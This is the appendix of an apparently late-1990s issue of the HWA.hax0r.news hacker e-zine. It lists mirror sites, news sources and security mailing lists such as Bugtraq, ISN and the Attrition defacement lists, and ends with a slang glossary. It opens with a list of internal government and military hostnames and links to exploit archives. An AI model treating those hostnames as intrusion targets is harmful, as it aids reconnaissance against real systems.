b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
mc1926.mcclellan.af.mil
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com

There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news...
- Ed

@HWA

A.3 Mirror Sites List
    ~~~~~~~~~~~~~~~~~

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Some of these are not keeping up with new issues like they should be, you
can always get the latest issue from www.csoft.net/~hwa or join us on IRC
(EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux
where the latest issues may be attained.

I also upload all issues to etext.org, the zines are available thru their
ftp service, updates are slow.

- Ed

New mirror sites

*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
*** http://datatwirl.intranova.net * NEW *
    http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
    http://net-security.org/hwahaxornews
    http://www.attrition.org/hosted/hwa/
    http://hwazine.cjb.net/
    http://www.hackunlimited.com/files/secu/papers/hwa/
    http://www.attrition.org/~modify/texts/zines/HWA/
  * http://hwa.hax0r.news.8m.com/
  * http://www.fortunecity.com/skyscraper/feature/103/

  * Crappy free sites of no use to anyone. too lazy to kill em.
*** Most likely to be up to date other than the main site.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

@HWA

A.4 The hacker's Ethic (90's Style)
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic spirit.
That spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.
@HWA

A.5 Sources *** (VERY incomplete)
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News site.........................http://www.ukhackers.com/ *NEW*
News site.........................http://www.hackernews.com.br/ *NEW*
News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
*News site (HNN) .................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
General Security/Exploits.........http://packetstorm.securify.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

* HNN Also archives back issues of their news, use the following url
  format http://www.hackernews.com/arch.html?012700 where 01=Jan 27=Date
  00=Year. They are archived here also as part of the compilation and
  broad archival concept we are trying to maintain with this publication.
  - Ed

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>

@HWA

A.6 Resources
    ~~~~~~~~~

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PLEASE if you have any changes or additions for this section please mail
them to cruciphux@dok.org. Thank you.

http://www.newsnow.co.uk/-NewsFeed.Tech.htm *NEW* from Tep
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
http://www.hack.co.za/ Current exploits archive
   ** Due to excessive network attacks this site is now being mirrored at
      http://www.siliconinc.net/hack/

Please send in links that you think should belong here to keep this
section up to date, it is overdue updating!.
A.7 Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

A.8 Mailing list Info
    ~~~~~~~~~~~~~~~~~

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html

--

defaced [web page defacement announce list]

This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of the mail.

There will be two types of posts to this list:

1. brief announcements as we learn of a web defacement. this will include
   the site, date, and who signed the hack. we will also include a URL of
   a mirror of the hack.

2. at the end of the day, a summary will be posted of all the hacks of
   the day.
these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. ;) -=- -- defaced summary [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail. There will be ONE type of post to this list: 1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. 
List maintainer: jericho@attrition.org
Hosted by:       majordomo@attrition.org

Relevant Links:
Disclaimer:       http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

defaced GM [web page defacement announce list]

This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel charged with tracking security incidents on government run networks.

This list is for informational purposes only. Subscribing denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by:       majordomo@attrition.org

Relevant Links:
Disclaimer:       http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

--

defaced alpha [web page defacement announce list]

This is a low traffic mail list to announce, via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail.

There will be ONE type of post to this list:

1.
sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates.

This list is designed primarily for government and military personnel charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI.

To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager.

This list is for informational purposes only. Subscribing denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by:       majordomo@attrition.org

Relevant Links:
Disclaimer:       http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body:

  subscribe bugtraq

I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index: http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks.

Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list's charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options, will be moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be:

  BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability database.

BUGTRAQ es muy bueno (BUGTRAQ is very good)
--------------------

It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people, or people that don't feel comfortable speaking English, can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which has not already been covered here will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese), which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>, and BUGTRAQ-SP (Spanish), which will be moderated by CORE SDI S.A. from Argentina <http://www.core-sdi.com/> (the folks that brought you Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information.

Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available:

* Incidents Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc, with the exception of widespread cases (Melissa, ADM worm, etc). The other choice people are usually left with is to email CERT, but this fails to communicate this important information to others that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits, new trojan horses and viruses, sources of attacks and tell-tale signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com.

On the information resource front you will find a large database of the following:

* Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well as links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade.

* Products. An incredible number of categorized security products from over two hundred different vendors.

* Services. A large and focused directory of security services offered by vendors.

* Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly from our servers when possible.

* Tools. A large array of free security tools. Categorized and available for download.

* News: A vast number of security news articles going all the way back to 1995.

* Security Resources: A directory to other security resources on the net.

As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun 14 Feb, 1999   Volume 11 : Issue 09
                               ISSN 1004-042X

Editor:         Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor:    Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist:      Brendan Kehoe
Poof Reader:    Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
                   Ralph Sims / Jyrki Kuoppala
                   Ian Dickinson

Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles; if I had my way I'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really.

Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more.

The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:

* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net

Welcome to Win2K Security Advice! Thank you for subscribing.
If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net.

To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec

==============

NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice), is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, viruses, worms, Trojans, and more.

Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list.

While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list.

The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:

To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net

To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net

Regards,
Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net

@HWA

A.9 Whats in a name? why HWA.hax0r.news??
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? Never mind, if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue.

Anyway.. on with the show ..

- Editorial staff

@HWA

A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 _   ___        ___    _____ _    ___
| | | \ \      / / \  |  ___/ \  / _ \
| |_| |\ \ /\ / / _ \ | |_ / _ \| | | |
|  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
|_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\

Also released in issue #3 (revised). Check that issue for the faq; it won't be reprinted unless changed in a big way, with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below. Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal". ASC(247), the "wavy equals" sign, means "almost equal to".
           If written as =/= (equals sign with a slash thru it) it also means !=. =< is equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL      - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe? At the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers, crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk, watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1. Someone who cracks games, encryption or codes; in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie", see pheer
           2. An edible biscuit, usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour <sic>, also wigger. Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary

EoA      - End of Article or more commonly @HWA

EoF      - End of file

EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN <g> - "Fear, uncertainty and doubt", usually in general media articles, not high brow articles such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.
*HACKER  - Read Steven Levy's HACKERS for the true definition, then see HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker; this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as, well, erhm, "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN      - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin' way

*0WN3D   - You are cracked and owned by an elite entity, see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups, Virus, Warfare

           Alternates:
           H  - hacking, hacktivist
           C  - Cracking <software>
           C  - Cracking <systems hacking>
           V  - Virus
           W  - Warfare <cyberwarfare usually as in Jihad>
           A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
           P  - Phreaking, "telephone hacking" PHone fREAKs ...
           CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your presence, see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some manuals are pure shit, but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.
*w00t    - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten" <sic>
           2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf     - what the fuck, where the fuck, when the fuck etc ..

*ZEN     - The state you reach when you *think* you know everything (but really don't); usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

A.11 NEW Underground E-Zines
     ~~~~~~~~~~~~~~~~~~~~~~~

InET.......................... http://www.warpedreality.com/inet
Hack In the Box............... http://www.thelimit.net/hitb
Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt
DataZine...................... http://www.tdcore.com
Napalm........................ http://napalm.firest0rm.org/
Digital Defiance.............. http://www.hackers.cx

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
